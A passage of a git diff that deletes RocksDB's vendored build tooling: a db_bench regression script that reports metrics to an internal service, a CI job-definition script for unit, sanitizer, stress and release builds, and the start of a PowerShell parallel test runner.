-    --benchmark_write_rate_limit=9502720 > ${STAT_FILE}.readwhilewriting_in_ram
-
-# Seekrandomwhilewriting
-./db_bench \
-    $common_in_mem_args \
-    --statistics=1 \
-    --max_background_compactions=4 \
-    --max_background_flushes=0 \
-    --benchmarks=seekrandomwhilewriting \
-    --use_existing_db=1 \
-    --use_tailing_iterator=1 \
-    --duration=600 \
-    --threads=32 \
-    --benchmark_write_rate_limit=9502720 > ${STAT_FILE}.seekwhilewriting_in_ram
-
-# measure fillseq with bunch of column families
-./db_bench \
-    --benchmarks=fillseq \
-    --num_column_families=500 \
-    --write_buffer_size=1048576 \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --num=$NUM \
-    --writes=$NUM \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0  > ${STAT_FILE}.fillseq_lots_column_families
-
-# measure overwrite performance with bunch of column families
-./db_bench \
-    --benchmarks=overwrite \
-    --num_column_families=500 \
-    --write_buffer_size=1048576 \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --num=$NUM \
-    --writes=$((NUM / 10)) \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=8 > ${STAT_FILE}.overwrite_lots_column_families
-
-# send data to ods
-function send_to_ods {
-  key="$1"
-  value="$2"
-
-  if [ -z $JENKINS_HOME ]; then
-    # running on devbox, just print out the values
-    echo $1 $2
-    return
-  fi
-
-  if [ -z "$value" ];then
-    echo >&2 "ERROR: Key $key doesn't have a value."
-    return
-  fi
-  curl -s "https://www.intern.facebook.com/intern/agent/ods_set.php?entity=rocksdb_build$git_br&key=$key&value=$value" \
-    --connect-timeout 60
-}
-
-function send_benchmark_to_ods {
-  bench="$1"
-  bench_key="$2"
-  file="$3"
-
-  QPS=$(grep $bench $file | awk '{print $5}')
-  P50_MICROS=$(grep $bench $file -A 6 | grep "Percentiles" | awk '{print $3}' )
-  P75_MICROS=$(grep $bench $file -A 6 | grep "Percentiles" | awk '{print $5}' )
-  P99_MICROS=$(grep $bench $file -A 6 | grep "Percentiles" | awk '{print $7}' )
-
-  send_to_ods rocksdb.build.$bench_key.qps $QPS
-  send_to_ods rocksdb.build.$bench_key.p50_micros $P50_MICROS
-  send_to_ods rocksdb.build.$bench_key.p75_micros $P75_MICROS
-  send_to_ods rocksdb.build.$bench_key.p99_micros $P99_MICROS
-}
-
-send_benchmark_to_ods overwrite overwrite $STAT_FILE.overwrite
-send_benchmark_to_ods fillseq fillseq $STAT_FILE.fillseq
-send_benchmark_to_ods readrandom readrandom $STAT_FILE.readrandom
-send_benchmark_to_ods readrandom readrandom_tailing $STAT_FILE.readrandomtailing
-send_benchmark_to_ods readrandom readrandom_smallblockcache $STAT_FILE.readrandomsmallblockcache
-send_benchmark_to_ods readrandom readrandom_memtable_sst $STAT_FILE.readrandom_mem_sst
-send_benchmark_to_ods readrandom readrandom_fillunique_random $STAT_FILE.readrandom_filluniquerandom
-send_benchmark_to_ods fillrandom memtablefillrandom $STAT_FILE.memtablefillreadrandom
-send_benchmark_to_ods readrandom memtablereadrandom $STAT_FILE.memtablefillreadrandom
-send_benchmark_to_ods readwhilewriting readwhilewriting $STAT_FILE.readwhilewriting
-send_benchmark_to_ods readwhilewriting readwhilewriting_in_ram ${STAT_FILE}.readwhilewriting_in_ram
-send_benchmark_to_ods seekrandomwhilewriting seekwhilewriting_in_ram ${STAT_FILE}.seekwhilewriting_in_ram
-send_benchmark_to_ods fillseq fillseq_lots_column_families ${STAT_FILE}.fillseq_lots_column_families
-send_benchmark_to_ods overwrite overwrite_lots_column_families ${STAT_FILE}.overwrite_lots_column_families
diff --git a/thirdparty/rocksdb/build_tools/rocksdb-lego-determinator b/thirdparty/rocksdb/build_tools/rocksdb-lego-determinator
deleted file mode 100755
index 6e8ae9c..0000000
--- a/thirdparty/rocksdb/build_tools/rocksdb-lego-determinator
+++ /dev/null
@@ -1,782 +0,0 @@
-#!/usr/bin/env bash
-# This script is executed by Sandcastle
-# to determine next steps to run
-
-# Usage:
-# EMAIL=<email> ONCALL=<email> TRIGGER=<trigger> SUBSCRIBER=<email> rocks_ci.py <test-name>
-#
-# Input         Value
-# -------------------------------------------------------------------------
-# EMAIL         Email address to report on trigger conditions
-# ONCALL        Email address to raise a task on failure
-# TRIGGER       Trigger conditions for email. Valid values are fail, warn, all
-# SUBSCRIBER    Email addresss to add as subscriber for task
-#
-
-#
-# Report configuration
-#
-REPORT_EMAIL=
-if [ ! -z $EMAIL ]; then
-  if [ -z $TRIGGER ]; then
-    TRIGGER="fail"
-  fi
-
-  REPORT_EMAIL="
-  {
-      'type':'email',
-      'triggers': [ '$TRIGGER' ],
-      'emails':['$EMAIL']
-  },"
-fi
-
-CREATE_TASK=
-if [ ! -z $ONCALL ]; then
-  CREATE_TASK="
-  {
-      'type':'task',
-      'triggers':[ 'fail' ],
-      'priority':0,
-      'subscribers':[ '$SUBSCRIBER' ],
-      'tags':[ 'rocksdb', 'ci' ],
-  },"
-fi
-
-# For now, create the tasks using only the dedicated task creation tool.
-CREATE_TASK=
-
-REPORT=
-if [[ ! -z $REPORT_EMAIL || ! -z $CREATE_TASK ]]; then
-  REPORT="'report': [
-    $REPORT_EMAIL
-    $CREATE_TASK
-  ]"
-fi
-
-#
-# Helper variables
-#
-CLEANUP_ENV="
-{
-    'name':'Cleanup environment',
-    'shell':'rm -rf /dev/shm/rocksdb && mkdir /dev/shm/rocksdb && (chmod +t /dev/shm || true)  && make clean',
-    'user':'root'
-}"
-
-# We will eventually set the RATIO to 1, but we want do this
-# in steps. RATIO=$(nproc) will make it work as J=1
-if [ -z $RATIO ]; then
-  RATIO=$(nproc)
-fi
-
-if [ -z $PARALLEL_J ]; then
-  PARALLEL_J="J=$(expr $(nproc) / ${RATIO})"
-fi
-
-if [ -z $PARALLEL_j ]; then
-  PARALLEL_j="-j$(expr $(nproc) / ${RATIO})"
-fi
-
-PARALLELISM="$PARALLEL_J $PARALLEL_j"
-
-DEBUG="OPT=-g"
-SHM="TEST_TMPDIR=/dev/shm/rocksdb"
-NON_SHM="TMPD=/tmp/rocksdb_test_tmp"
-GCC_481="ROCKSDB_FBCODE_BUILD_WITH_481=1"
-ASAN="COMPILE_WITH_ASAN=1"
-CLANG="USE_CLANG=1"
-LITE="OPT=\"-DROCKSDB_LITE -g\""
-TSAN="COMPILE_WITH_TSAN=1"
-UBSAN="COMPILE_WITH_UBSAN=1"
-DISABLE_JEMALLOC="DISABLE_JEMALLOC=1"
-HTTP_PROXY="https_proxy=http://fwdproxy.29.prn1:8080 http_proxy=http://fwdproxy.29.prn1:8080 ftp_proxy=http://fwdproxy.29.prn1:8080"
-SETUP_JAVA_ENV="export $HTTP_PROXY; export JAVA_HOME=/usr/local/jdk-8u60-64/; export PATH=\$JAVA_HOME/bin:\$PATH"
-PARSER="'parser':'python build_tools/error_filter.py $1'"
-
-CONTRUN_NAME="ROCKSDB_CONTRUN_NAME"
-
-# This code is getting called under various scenarios. What we care about is to
-# understand when it's called from nightly contruns because in that case we'll
-# create tasks for any failures. To follow the existing pattern, we'll check
-# the value of $ONCALL. If it's a diff then just call `false` to make sure
-# that errors will be properly propagated to the caller.
-if [ ! -z $ONCALL ]; then
-  TASK_CREATION_TOOL="/usr/local/bin/mysql_mtr_filter --rocksdb --oncall $ONCALL"
-else
-  TASK_CREATION_TOOL="false"
-fi
-
-ARTIFACTS=" 'artifacts': [
-    {
-        'name':'database',
-        'paths':[ '/dev/shm/rocksdb' ],
-    }
-]"
-
-#
-# A mechanism to disable tests temporarily
-#
-DISABLE_COMMANDS="[
-    {
-        'name':'Disable test',
-        'oncall':'$ONCALL',
-        'steps': [
-            {
-              'name':'Job disabled. Please contact test owner',
-              'shell':'exit 1',
-              'user':'root'
-            },
-        ],
-    }
-]"
-
-#
-# RocksDB unit test
-#
-UNIT_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug version',
-                'shell':'$SHM $DEBUG make $PARALLELISM check || $CONTRUN_NAME=check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test not under /dev/shm
-#
-UNIT_TEST_NON_SHM_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug version',
-                'timeout': 86400,
-                'shell':'$NON_SHM $DEBUG make $PARALLELISM check || $CONTRUN_NAME=non_shm_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB release build and unit tests
-#
-RELEASE_BUILD_COMMANDS="[
-    {
-        'name':'Rocksdb Release Build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB release',
-                'shell':'make $PARALLEL_j release || $CONTRUN_NAME=release $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test on gcc-4.8.1
-#
-UNIT_TEST_COMMANDS_481="[
-    {
-        'name':'Rocksdb Unit Test on GCC 4.8.1',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug version',
-                'shell':'$SHM $GCC_481 $DEBUG make $PARALLELISM check || $CONTRUN_NAME=unit_gcc_481_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB release build and unit tests
-#
-RELEASE_BUILD_COMMANDS_481="[
-    {
-        'name':'Rocksdb Release on GCC 4.8.1',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB release on GCC 4.8.1',
-                'shell':'$GCC_481 make $PARALLEL_j release || $CONTRUN_NAME=release_gcc481 $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test with CLANG
-#
-CLANG_UNIT_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug',
-                'shell':'$CLANG $SHM $DEBUG make $PARALLELISM check || $CONTRUN_NAME=clang_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB release build with CLANG
-#
-CLANG_RELEASE_BUILD_COMMANDS="[
-    {
-        'name':'Rocksdb CLANG Release Build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB release',
-                'shell':'$CLANG make $PARALLEL_j release|| $CONTRUN_NAME=clang_release $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB analyze
-#
-CLANG_ANALYZE_COMMANDS="[
-    {
-        'name':'Rocksdb analyze',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'RocksDB build and analyze',
-                'shell':'$CLANG $SHM $DEBUG make $PARALLEL_j analyze || $CONTRUN_NAME=clang_analyze $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB code coverage
-#
-CODE_COV_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test Code Coverage',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build, test and collect code coverage info',
-                'shell':'$SHM $DEBUG make $PARALLELISM coverage || $CONTRUN_NAME=coverage $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unity
-#
-UNITY_COMMANDS="[
-    {
-        'name':'Rocksdb Unity',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build, test unity test',
-                'shell':'$SHM $DEBUG V=1 make J=1 unity_test || $CONTRUN_NAME=unity_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# Build RocksDB lite
-#
-LITE_BUILD_COMMANDS="[
-    {
-        'name':'Rocksdb Lite build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB debug version',
-                'shell':'$LITE make J=1 all check || $CONTRUN_NAME=lite $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB stress/crash test
-#
-STRESS_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Stress/Crash Test',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB debug stress tests',
-                'shell':'$SHM $DEBUG make J=1 db_stress || $CONTRUN_NAME=db_stress $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-            {
-                'name':'Build and run RocksDB debug crash tests',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make J=1 crash_test || $CONTRUN_NAME=crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        $ARTIFACTS,
-        $REPORT
-    }
-]"
-
-# RocksDB write stress test.
-# We run on disk device on purpose (i.e. no $SHM)
-# because we want to add some randomness to fsync commands
-WRITE_STRESS_COMMANDS="[
-    {
-        'name':'Rocksdb Write Stress Test',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB write stress tests',
-                'shell':'make write_stress && python tools/write_stress_runner.py --runtime_sec=3600 --db=/tmp/rocksdb_write_stress || $CONTRUN_NAME=write_stress $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        'artifacts': [{'name': 'database', 'paths': ['/tmp/rocksdb_write_stress']}],
-        $REPORT
-    }
-]"
-
-
-#
-# RocksDB test under address sanitizer
-#
-ASAN_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under ASAN',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Test RocksDB debug under ASAN',
-'shell':'set -o pipefail && ($SHM $ASAN $DEBUG make $PARALLELISM asan_check || $CONTRUN_NAME=asan_check $TASK_CREATION_TOOL) |& /usr/facebook/ops/scripts/asan_symbolize.py -d',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB crash testing under address sanitizer
-#
-ASAN_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb crash test under ASAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB debug asan_crash_test',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make J=1 asan_crash_test || $CONTRUN_NAME=asan_crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB test under undefined behavior sanitizer
-#
-UBSAN_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under UBSAN',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Test RocksDB debug under UBSAN',
-                'shell':'set -o pipefail && $SHM $UBSAN $DEBUG make $PARALLELISM ubsan_check || $CONTRUN_NAME=ubsan_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB crash testing under udnefined behavior sanitizer
-#
-UBSAN_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb crash test under UBSAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB debug ubsan_crash_test',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make J=1 ubsan_crash_test || $CONTRUN_NAME=ubsan_crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test under valgrind
-#
-VALGRIND_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under valgrind',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit tests',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make $PARALLELISM valgrind_test || $CONTRUN_NAME=valgrind_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB test under TSAN
-#
-TSAN_UNIT_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under TSAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit test',
-                'timeout': 86400,
-                'shell':'set -o pipefail && $SHM $DEBUG $TSAN make $PARALLELISM check || $CONTRUN_NAME=tsan_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB crash test under TSAN
-#
-TSAN_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Crash Test under TSAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Compile and run',
-                'timeout': 86400,
-                'shell':'set -o pipefail && $SHM $DEBUG $TSAN CRASH_TEST_KILL_ODD=1887 CRASH_TEST_EXT_ARGS=--log2_keys_per_lock=22  make J=1 crash_test || $CONTRUN_NAME=tsan_crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB format compatible
-#
-
-run_format_compatible()
-{
-  export TEST_TMPDIR=/dev/shm/rocksdb
-  rm -rf /dev/shm/rocksdb
-  mkdir /dev/shm/rocksdb
-
-  tools/check_format_compatible.sh
-}
-
-FORMAT_COMPATIBLE_COMMANDS="[
-    {
-        'name':'Rocksdb Format Compatible tests',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit test',
-                'shell':'build_tools/rocksdb-lego-determinator run_format_compatible || $CONTRUN_NAME=run_format_compatible $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB no compression
-#
-run_no_compression()
-{
-  export TEST_TMPDIR=/dev/shm/rocksdb
-  rm -rf /dev/shm/rocksdb
-  mkdir /dev/shm/rocksdb
-  make clean
-  cat build_tools/fbcode_config.sh | grep -iv dzlib | grep -iv dlz4 | grep -iv dsnappy | grep -iv dbzip2 > .tmp.fbcode_config.sh
-  mv .tmp.fbcode_config.sh build_tools/fbcode_config.sh
-  cat Makefile | grep -v tools/ldb_test.py > .tmp.Makefile
-  mv .tmp.Makefile Makefile
-  make $DEBUG J=1 check
-}
-
-NO_COMPRESSION_COMMANDS="[
-    {
-        'name':'Rocksdb No Compression tests',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit test',
-                'shell':'build_tools/rocksdb-lego-determinator run_no_compression || $CONTRUN_NAME=run_no_compression $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB regression
-#
-run_regression()
-{
-  time -v bash -vx ./build_tools/regression_build_test.sh $(mktemp -d  $WORKSPACE/leveldb.XXXX) $(mktemp leveldb_test_stats.XXXX)
-
-  # ======= report size to ODS ========
-
-  # parameters: $1 -- key, $2 -- value
-  function send_size_to_ods {
-    curl -s "https://www.intern.facebook.com/intern/agent/ods_set.php?entity=rocksdb_build&key=rocksdb.build_size.$1&value=$2" \
-      --connect-timeout 60
-  }
-
-  # === normal build ===
-  make clean
-  make -j$(nproc) static_lib
-  send_size_to_ods static_lib $(stat --printf="%s" librocksdb.a)
-  strip librocksdb.a
-  send_size_to_ods static_lib_stripped $(stat --printf="%s" librocksdb.a)
-
-  make -j$(nproc) shared_lib
-  send_size_to_ods shared_lib $(stat --printf="%s" `readlink -f librocksdb.so`)
-  strip `readlink -f librocksdb.so`
-  send_size_to_ods shared_lib_stripped $(stat --printf="%s" `readlink -f librocksdb.so`)
-
-  # === lite build ===
-  make clean
-  OPT=-DROCKSDB_LITE make -j$(nproc) static_lib
-  send_size_to_ods static_lib_lite $(stat --printf="%s" librocksdb.a)
-  strip librocksdb.a
-  send_size_to_ods static_lib_lite_stripped $(stat --printf="%s" librocksdb.a)
-
-  OPT=-DROCKSDB_LITE make -j$(nproc) shared_lib
-  send_size_to_ods shared_lib_lite $(stat --printf="%s" `readlink -f librocksdb.so`)
-  strip `readlink -f librocksdb.so`
-  send_size_to_ods shared_lib_lite_stripped $(stat --printf="%s" `readlink -f librocksdb.so`)
-}
-
-REGRESSION_COMMANDS="[
-    {
-        'name':'Rocksdb regression commands',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Make and run script',
-                'shell':'build_tools/rocksdb-lego-determinator run_regression || $CONTRUN_NAME=run_regression $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB Java build
-#
-JAVA_BUILD_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Java Build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB for Java',
-                'shell':'$SETUP_JAVA_ENV; $SHM make rocksdbjava || $CONTRUN_NAME=rocksdbjava $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-
-case $1 in
-  unit)
-    echo $UNIT_TEST_COMMANDS
-    ;;
-  unit_non_shm)
-    echo $UNIT_TEST_NON_SHM_COMMANDS
-    ;;
-  release)
-    echo $RELEASE_BUILD_COMMANDS
-    ;;
-  unit_481)
-    echo $UNIT_TEST_COMMANDS_481
-    ;;
-  release_481)
-    echo $RELEASE_BUILD_COMMANDS_481
-    ;;
-  clang_unit)
-    echo $CLANG_UNIT_TEST_COMMANDS
-    ;;
-  clang_release)
-    echo $CLANG_RELEASE_BUILD_COMMANDS
-    ;;
-  clang_analyze)
-    echo $CLANG_ANALYZE_COMMANDS
-    ;;
-  code_cov)
-    echo $CODE_COV_COMMANDS
-    ;;
-  unity)
-    echo $UNITY_COMMANDS
-    ;;
-  lite)
-    echo $LITE_BUILD_COMMANDS
-    ;;
-  stress_crash)
-    echo $STRESS_CRASH_TEST_COMMANDS
-    ;;
-  write_stress)
-    echo $WRITE_STRESS_COMMANDS
-    ;;
-  asan)
-    echo $ASAN_TEST_COMMANDS
-    ;;
-  asan_crash)
-    echo $ASAN_CRASH_TEST_COMMANDS
-    ;;
-  ubsan)
-    echo $UBSAN_TEST_COMMANDS
-    ;;
-  ubsan_crash)
-    echo $UBSAN_CRASH_TEST_COMMANDS
-    ;;
-  valgrind)
-    echo $VALGRIND_TEST_COMMANDS
-    ;;
-  tsan)
-    echo $TSAN_UNIT_TEST_COMMANDS
-    ;;
-  tsan_crash)
-    echo $TSAN_CRASH_TEST_COMMANDS
-    ;;
-  format_compatible)
-    echo $FORMAT_COMPATIBLE_COMMANDS
-    ;;
-  run_format_compatible)
-    run_format_compatible
-    ;;
-  no_compression)
-    echo $NO_COMPRESSION_COMMANDS
-    ;;
-  run_no_compression)
-    run_no_compression
-    ;;
-  regression)
-    echo $REGRESSION_COMMANDS
-    ;;
-  run_regression)
-    run_regression
-    ;;
-  java_build)
-    echo $JAVA_BUILD_TEST_COMMANDS
-    ;;
-  *)
-    echo "Invalid determinator command"
-    ;;
-esac
diff --git a/thirdparty/rocksdb/build_tools/run_ci_db_test.ps1 b/thirdparty/rocksdb/build_tools/run_ci_db_test.ps1
deleted file mode 100644
index c8167ed..0000000
--- a/thirdparty/rocksdb/build_tools/run_ci_db_test.ps1
+++ /dev/null
@@ -1,456 +0,0 @@
-# This script enables you running RocksDB tests by running
-# All the tests concurrently and utilizing all the cores
-Param(
-  [switch]$EnableJE = $false,  # Look for and use _je executable, append _je to listed exclusions
-  [switch]$RunAll = $false,    # Will attempt discover all *_test[_je].exe binaries and run all
-                               # of them as Google suites. I.e. It will run test cases concurrently
-                               # except those mentioned as $Run, those will run as individual test cases
-                               # And any execlued with $ExcludeExes or $ExcludeCases
-                               # It will also not run any individual test cases
-                               # excluded but $ExcludeCasese
-  [string]$SuiteRun = "",      # Split test suites in test cases and run in parallel, not compatible with $RunAll
-  [string]$Run = "",           # Run specified executables in parallel but do not split to test cases
-  [string]$ExcludeCases = "",  # Exclude test cases, expects a comma separated list, no spaces
-                               # Takes effect when $RunAll or $SuiteRun is specified. Must have full
-                               # Test cases name including a group and a parameter if any
-  [string]$ExcludeExes = "",   # Exclude exes from consideration, expects a comma separated list,
-                               # no spaces. Takes effect only when $RunAll is specified
-  [string]$WorkFolder = "",    # Direct tests to use that folder. SSD or Ram drive are better options.
-   # Number of async tasks that would run concurrently. Recommend a number below 64.
-   # However, CPU utlization really depends on the storage media. Recommend ram based disk.
-   # a value of 1 will run everything serially
-  [int]$Concurrency = 8,
-  [int]$Limit = -1 # -1 means do not limit for test purposes
-)
-
-# Folders and commands must be fullpath to run assuming
-# the current folder is at the root of the git enlistment
-$StartDate = (Get-Date)
-$StartDate
-
-
-$DebugPreference = "Continue"
-
-# These tests are not google test suites and we should guard
-# Against running them as suites
-$RunOnly = New-Object System.Collections.Generic.HashSet[string]
-$RunOnly.Add("c_test") | Out-Null
-$RunOnly.Add("compact_on_deletion_collector_test") | Out-Null
-$RunOnly.Add("merge_test") | Out-Null
-$RunOnly.Add("stringappend_test") | Out-Null # Apparently incorrectly written
-$RunOnly.Add("backupable_db_test") | Out-Null # Disabled
-
-
-if($RunAll -and $SuiteRun -ne "") {
-    Write-Error "$RunAll and $SuiteRun are not compatible"
-    exit 1
-}
-
-# If running under Appveyor assume that root
-[string]$Appveyor = $Env:APPVEYOR_BUILD_FOLDER
-if($Appveyor -ne "") {
-    $RootFolder = $Appveyor
-} else {
-    $RootFolder = $PSScriptRoot -replace '\\build_tools', ''
-}
-
-$LogFolder = -Join($RootFolder, "\db_logs\")
-$BinariesFolder = -Join($RootFolder, "\build\Debug\")
-
-if($WorkFolder -eq "") {
-
-    # If TEST_TMPDIR is set use it    
-    [string]$var = $Env:TEST_TMPDIR
-    if($var -eq "") {
-        $WorkFolder = -Join($RootFolder, "\db_tests\")
-        $Env:TEST_TMPDIR = $WorkFolder
-    } else {
-        $WorkFolder = $var
-    }
-} else {
-# Override from a command line
-  $Env:TEST_TMPDIR = $WorkFolder
-}
-
-Write-Output "Root: $RootFolder, WorkFolder: $WorkFolder"
-Write-Output "BinariesFolder: $BinariesFolder, LogFolder: $LogFolder"
-
-# Create test directories in the current folder
-md -Path $WorkFolder -ErrorAction Ignore | Out-Null
-md -Path $LogFolder -ErrorAction Ignore | Out-Null
-
-
-$ExcludeCasesSet = New-Object System.Collections.Generic.HashSet[string]
-if($ExcludeCases -ne "") {
-    Write-Host "ExcludeCases: $ExcludeCases"
-    $l = $ExcludeCases -split ' '
-    ForEach($t in $l) { 
-      $ExcludeCasesSet.Add($t) | Out-Null
-    }
-}
-
-$ExcludeExesSet = New-Object System.Collections.Generic.HashSet[string]
-if($ExcludeExes -ne "") {
-    Write-Host "ExcludeExe: $ExcludeExes"
-    $l = $ExcludeExes -split ' '
-    ForEach($t in $l) { 
-      $ExcludeExesSet.Add($t) | Out-Null
-    }
-}
-
-
-# Extract the names of its tests by running db_test with --gtest_list_tests.
-# This filter removes the "#"-introduced comments, and expands to
-# fully-qualified names by changing input like this:
-#
-#   DBTest.
-#     Empty
-#     WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.
-#     MultiThreaded/0  # GetParam() = 0
-#     MultiThreaded/1  # GetParam() = 1
-#
-# into this:
-#
-#   DBTest.Empty
-#   DBTest.WriteEmptyBatch
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/0
-#   MultiThreaded/MultiThreadedDBTest.MultiThreaded/1
-#
-# Output into the parameter in a form TestName -> Log File Name
-function ExtractTestCases([string]$GTestExe, $HashTable) {
-
-    $Tests = @()
-# Run db_test to get a list of tests and store it into $a array
-    &$GTestExe --gtest_list_tests | tee -Variable Tests | Out-Null
-
-    # Current group
-    $Group=""
-
-    ForEach( $l in $Tests) {
-
-      # Leading whitespace is fine
-      $l = $l -replace '^\s+',''
-      # but no whitespace any other place
-      if($l -match "\s+") {
-        continue
-      }
-      # Trailing dot is a test group but no whitespace
-      elseif ( $l -match "\.$" ) {
-        $Group = $l
-      }  else {
-        # Otherwise it is a test name, remove leading space
-        $test = $l
-        # remove trailing comment if any and create a log name
-        $test = $test -replace '\s+\#.*',''
-        $test = "$Group$test"
-
-        if($ExcludeCasesSet.Contains($test)) {
